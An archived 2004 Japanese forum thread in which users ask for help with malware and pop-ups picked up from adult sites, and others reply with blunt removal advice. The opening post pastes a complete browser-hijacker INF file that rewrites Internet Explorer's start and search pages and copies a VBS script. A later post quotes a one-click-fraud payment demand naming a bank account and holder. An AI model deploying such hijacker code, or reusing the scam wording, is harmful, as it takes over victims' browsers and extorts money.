956 :
940 :04/09/08 07:33 ID:T/LoyyCm
[Version]
Signature="$CHICAGO$"
AdvancedINF=2.0
[DefaultInstall]
AddReg=AddReg
CopyFiles=CopyFiles
[DestinationDirs]
CopyFiles=16408
[AddReg]
HKCU,"Software\Microsoft\Internet Explorer\Main","Search Page",,"
http://www.searchwww.com/ "
HKCU,"Software\Microsoft\Internet Explorer\Main","Start Page",,"
http://www.searchwww.com/ "
HKCU,"Software\Microsoft\Internet Explorer\MenuExt\Shorten URL",,,"
http://www.cjb.net/menuext.html "
HKLM,"Software\Microsoft\Internet Explorer\Search","SearchAssistant",,"
http://www.searchwww.com/bar.html "
[CopyFiles]
search.vbs=Search.vbs
これはどうすればいいでしょうか。
>>956 情報を小出しにすんなよ
もう一度、テンプレ実行しろよ
アンチウイルスソフト入っているか?
入れて無かった買って来いよ
>>956 レジストリの登録場所もわかっているじゃないか
その情報をどう利用するかはあなた次第
豚に真珠か?
959 :
ひよこ名無しさん :04/09/08 10:17 ID:arDwaqHA
毎日何時間か経つごとに ウィンドウが開いてエロいのが出てこまってます。 外国サイトなのでどうすれば出なくなるのか判らないし・・ いい方法ないですか
暫らく繋がりませんでしたよん。
hiragana hyouji ga dekinainohanazenandesuka?
964 :
952 :04/09/08 12:51 ID:???
>>964 だったらトレンドマイクロのデータベースでも見て手動駆除しろよ
何て名前のものが出てきたのかすら情報書かない奴にアドバイスする気も起きないし
トレンドマイクロならデータベースあるからそこ見れば手動駆除できんだろが
すみません。俺98seなんですがネットでウイルススキャンしたらいくつかウイルスに感染してて その感染したファイルを消そうとしたら、Downloader.Trojanというのに感染してる c:\WINDOWS\SYSTEM\services\MSXMIDI.EXEはwindosに使用されているので削除できませんとかなるんです。 無料で駆除ツールとか無いものでしょうか? なんか消しても消しても新しいダイヤルアップが追加されます。助けて。
969 :
968 :04/09/08 14:19 ID:64wqwgtL
他から来ました。
(・3・) エェー 相手したくないけどセーフモードで該当ファイル消せYO 親玉が居たら復活するけどNE
>>968 無料のアンチウィルスソフトでも探して入れてみればいいだろ
Avast!の日本語版でも自分で探して入れてみれば?
>>973 書いている内容が全くのコピペ=何も試したりしてないって事だからマルチ
ここはネタスレだからOK牧場。
とにかく信用できるかわからないサイトに入ろうとする場合は 親の確認が必要なんだ! みんなもエロサイトに入ろうとする時はまず親に確認してもらおう! お兄さんとの約束だ!
でもお兄ちゃん、そんな事したら僕が変態だってバレちゃうよ。
>>976 信用できるかどうかなんてわからないよ。
979 :
ひよこ名無しさん :04/09/08 16:46 ID:jWcEifHZ
通報済み >お支払期限:入会から4日以内 利用期間:180日 下記の口座までご利用料金を、お振込みください。 振込み口座: 東京三菱銀行 新宿中央支店 普通口座 5543147 ニシダテ ヒロタカ ※ ご注意 ※ お支払期限を過ぎてもお客様からの入金が確認出来ない場合は、お客さまの個体識別情報を基に身元調査業者による追跡調査を行い、利用料金の他に延滞料金50000円と調査費用を自宅訪問等の手段によって直接的に回収させて頂く事になります。 入金済みのお客様は上記の表示が表示されても重複課金される事はありません。
980 :
ひよこ名無しさん :04/09/08 16:51 ID:htgLeKN3
昨日からYahoo!BBを使用している者なんですが、Yahoo!BBにした次の日スタートページが 設定しなおしても 「SerchFor」なるサイトになってしまいます。ギコナビを使用する際 にもこれが出てします。 不安なんでスパイウェアチェックを行った結果、「Windows」 というスパイウェアが二つと 「CoolWeb」というスパイウェアが検出されました。 Windowsは消すとヤバめなんで消しませんでしたが、CoolWebは名前からして胡散臭いので 削除しました。しかしこれを消してもスタートページはSerchForのままで、もう一度 スパイウェア チェックすると消したはずのCoolWebがまだあるのです。 今の所スタートページがSerchForというサイトになるだけなんですが、英語で 変なポップアップが出てウザイです。どうすれば直るんでしょうか? 当方使用OSはWin98、IEは6.0です。
982 :
980 :04/09/08 18:28 ID:htgLeKN3
>>981 先ほどそのサイトの内容を見て対処しようとしたのですが、SerchForのソースを取ろうとしても右クリックができません。
メモ帳の修正も行ったのですが、やはり右クリックしても無反応でした。(ちなみに他サイトでは普通にソース取れたので
右のボタン自体が壊れてるわけではありませんでした)もしかしてメモ帳トラッパーをインストールしてるからでしょうか?
どうかここらへんを教えてください。
それじゃ1000鳥だ
987 :
984 :04/09/08 23:20 ID:???
ウソだよん
∧ ∧
/ ヽ ./ .∧
/ `、 / ∧
/  ̄ ̄ ̄ ヽ
>>984 /::::::::: .\
>>882 /:::::::::: ヽ-=・=-′ ヽ-=・=- ∧/ ∧
ヽ::::::::::: \___/ / ヽ / ヽ
ヽ:::::::::::::: \/ / ヽ_____/ ヽ
/ / \
| / ヽ
| '''''"´) ● \─/ ● |'´)
\ -‐´ ヽ/ /´
| | \ /
>>988 テンプレをまとめて、最新の情報にするホームページ作って公開するなら
>>882 にしてもいいと俺は思ってるよ。
昔のテンプレ貼るだけだったら糞の役にも立たないからいらない。
はいいろに代わるまとめサイト作成、超頑張れ。
梅
よ〜し1000取るぞ!!!
まもなくここは 乂1000取り合戦場乂 となります。
\∧_ヘ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!! ,,、,、,,,
/三√ ゚Д゚) / \____________ ,,、,、,,,
/三/| ゚U゚|\ ,,、,、,,, ,,、,、,,,
,,、,、,,, U (:::::::::::) ,,、,、,,, \オーーーーーーーッ!!/
//三/|三|\ ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
∪ ∪ ( ) ( ) ( ) )
,,、,、,,, ,,、,、,,, ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
,,、,、,,, ( ) ( ) ( ) ( )
次スレ
エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/
忘れ去られてる?寂しいねぇ〜・・・・・・・・・・・・・・・・・・・・
埋め
梅
生め
膿め
倦め
熟め
華麗に1000ゲト
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。